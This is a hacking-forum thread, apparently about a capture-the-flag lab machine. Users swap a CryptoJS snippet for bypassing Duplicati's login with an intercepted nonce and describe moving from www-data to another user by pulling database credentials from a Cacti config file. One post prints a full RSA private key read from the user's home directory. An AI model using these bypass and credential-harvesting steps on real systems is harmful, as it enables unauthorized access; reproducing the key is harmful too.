[hollb_geek]

You need to use -m 0

Nevermind, I just notice it was in the pot file, the --show indicated i already cracked one hash

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[rootme1122]

var saltedpwd = 'HexOutputFromCyberChef'; // Replace with the Hex output from step 6
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('NonceFromBurp') + saltedpwd)).toString(CryptoJS.enc.Base64); // Replace 'NonceFromBurp' with the intercepted nonce
console.log(noncedpwd);


need help after this?????

[f4k3h4ck3r]

var saltedpwd = 'HexOutputFromCyberChef'; // Replace with the Hex output from step 6
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('NonceFromBurp') + saltedpwd)).toString(CryptoJS.enc.Base64); // Replace 'NonceFromBurp' with the intercepted nonce
console.log(noncedpwd);


need help after this?????

I'm also stuck here, bypass is not working with me

[0x404]

var saltedpwd = 'HexOutputFromCyberChef'; // Replace with the Hex output from step 6
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('NonceFromBurp') + saltedpwd)).toString(CryptoJS.enc.Base64); // Replace 'NonceFromBurp' with the intercepted nonce
console.log(noncedpwd);


need help after this?????

I'm also stuck here, bypass is not working with me

It didn't work here either =\

[f4k3h4ck3r]

var saltedpwd = 'HexOutputFromCyberChef'; // Replace with the Hex output from step 6
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('NonceFromBurp') + saltedpwd)).toString(CryptoJS.enc.Base64); // Replace 'NonceFromBurp' with the intercepted nonce
console.log(noncedpwd);


need help after this?????

I'm also stuck here, bypass is not working with me

It didn't work here either =\

console.log(CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse("r5Xf9war2EPduVIifCAVQqsUOcYLnSPpYFfW9LGONEA=")+"59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a")).toString(CryptoJS.enc.Base64));

This also did not worked

[UnkownWombat]

from www-data to marcus: check /var/www/html/cacti/include/config.php where you'll find database connection credentials, connect to mariadb and get the password hash of marcus, crack it and you got your user flag

---

Any idea on privesc from duplicati to root?

you don't need to do any of that you can just set marcus password in cacti , but I can't connect to marcus via ssh , it's not allowed with a password.

www-data@monitorsthree:/tmp$ cat /etc/ssh/sshd_config | grep -i PasswordAuthentication
<tc/ssh/sshd_config | grep -i PasswordAuthentication
PasswordAuthentication no
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication, then enable this but set PasswordAuthentication


what am i doing wrong?

you need rsa file since password only auth is disabled

-rw------- 1 marcus marcus 1675 Aug 24 19:01 /home/marcus/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAxXKXgsj2bIkLzln/zrjXclYVVPfBC5CHtq7RsHdCpZZobQnd
ulf4RYt9xWVNYK4dcNf10FAaAxEc5K2FxgRw1u7k1KdodeTwVI0dnynjMHQ1pitc
b6av4aqfOqu/4veywgnsa883/zn7RNgFPItVE0Uinxmycxfax0it3jkqeqnB7bS/
KejZJBSlbQx/Z2S8LrjTwqYIGe77GnW2hH4iUAtuBdhCtgA6XR4u2kXjIANpNXOr
/L/z8NA216jXWh8YAcLR3NdB9zzjCz8ByykYlFPKBY6hdNbvBxBa8OQxdSfIR8fP
86edvYE8xLeXEA7CSJJ7LtbZqjA1mWXOERvBcQIDAQABAoH/Tf7qWSsGGIfNC+uB
Z22uDUrmX8O8OE5wnFTOs5MTfiKfUNL2LymKGtbYMmso+x4lTH2Oytg1uWNnC5kM
Gy5vSVl4LYw4Iwuc/BR+NvKJ5fSKdtchlnDI4/q6xgpP3CO1FMvdkBUB3x0h9saY
rfCuMYZqsPqL3esffBe5tbEgKWuMML8nAqnzHeCVkM9PkBhPKHNyDmMHPJpAa2q+
YA3N1EPACsT9PQ0NUjnXItRQbGIUrgOZkU+lZ+M1W9wnavmVMEZgK4OVnM3s7a1o
Br+/WVB6Pmx2xvrHBSBIfQp9j0uKOFqbkdEK4BT3UqY+vAKmnnvuP/CNFinOE2Vh
aUvpAoGBAPLMxcDNs1xy+PBZxqu5A/rTMMB9KItwGodRnrAWc1HfuIL1T/Y+3D/t
nS94/EeL4c645CIJHdRZyk2UH4VCyIpI6HRGIwVofxvY7uIaO4fS1c9G4Ffda7EI
F3bYX7uKB2dlAmYWzZlxUp0jAlGRGh8QcaH59I9ZLKdh+oYH2J99AoGBANAunjLW
L2CokWbcrOaZ9a1K0sdXvHV3CbXVdWuBm7fO4MRiKkBCp2/H7NWn/g831yaN8JAf
zhpDxTieNaXwbpndQvSfCJDbL8ATcEUY0JICkDlCkVuylMFHiEhjz1yEeCvFSVns
HTSVwK+vpIKLqIt73ddDsTpeh3vbcIFyzHQFAoGBANIsA7pj1TDfrTGQ5PLdEt7a
VUcqkCAziCM+udi/dk+XE0b5RqBnxYvpCbmARxE/utWRIpl7vsCEgSQqZiaaqrFZ
by7HT6Vs0Sqv3AkIoCNwk/f66FPmrUPvNzB/GE9kqggMXck1T//VIqg3F9i3fB8L
wvFtRw+XJ5o0rAG9ZPyZAoGAfhCcz+AP1JJ/ajCbqxD0SroSpZAlmWQ6Rxg6AJ39
s/Lc/U8MktlKF1CTxFX0bTa9XKV7VWtNHW6IkV6M0i2kbBwmnYdoYn+4jLG4vL7o
HmLa/zGmYEbl+ZzdlCiMu1OkiazwXDm0/dDpW/oavsrfh4e8sMxXGCeCF6ismlbw
JBkCgYEAwvKimYhLYfvywwheBK1AsFHBQ8vq7rZACzV6MYzmOk6Hr45z7SV6LhNd
xpPA81f9OUSYohrfKO1ES1grPVyif9NkgDCrqM8WTrYano8AwVBMHhl/6BAcX0wg
ri6rFwDJA1w+CQzmJJorLShsxADey95ZdizJ1sOxtk+9NJDb0nw=
-----END RSA PRIVATE KEY-----
-rw-r--r-- 1 marcus marcus 380 Aug 24 19:01 /home/marcus/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFcpeCyPZsiQvOWf/OuNdyVhVU98ELkIe2rtGwd0KllmhtCd26V/hFi33FZU1grh1w1/XQUBoDERzkrYXGBHDW7uTUp2h15PBUjR2fKeMwdDWmK1xvpq/hqp86q7/i97LCCexrzzf/OftE2AU8i1UTRSKfGbJzF9rHSK3eOSp6qcHttL8p6NkkFKVtDH9nZLwuuNPCpggZ7vsadbaEfiJQC24F2EK2ADpdHi7aReMgA2k1c6v8v/Pw0DbXqNdaHxgBwtHc10H3POMLPwHLKRiUU8oFjqF01u8HEFrw5DF1J8hHx8/zp529gTzEt5cQDsJIknsu1tmqMDWZZc4RG8Fx

[lucifer_devil_003]

hey can you help me

[letsddos007]

this is what it is, and it is good I think

[shadow__monarch]

any hint for root ?

[humanai]

var saltedpwd = 'HexOutputFromCyberChef'; // Replace with the Hex output from step 6
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('NonceFromBurp') + saltedpwd)).toString(CryptoJS.enc.Base64); // Replace 'NonceFromBurp' with the intercepted nonce
console.log(noncedpwd);


need help after this?????

I'm also stuck here, bypass is not working with me

It didn't work here either =\

console.log(CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse("r5Xf9war2EPduVIifCAVQqsUOcYLnSPpYFfW9LGONEA=")+"59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a")).toString(CryptoJS.enc.Base64));

This also did not worked

This looks correct, make sure you use the correct nonce for your session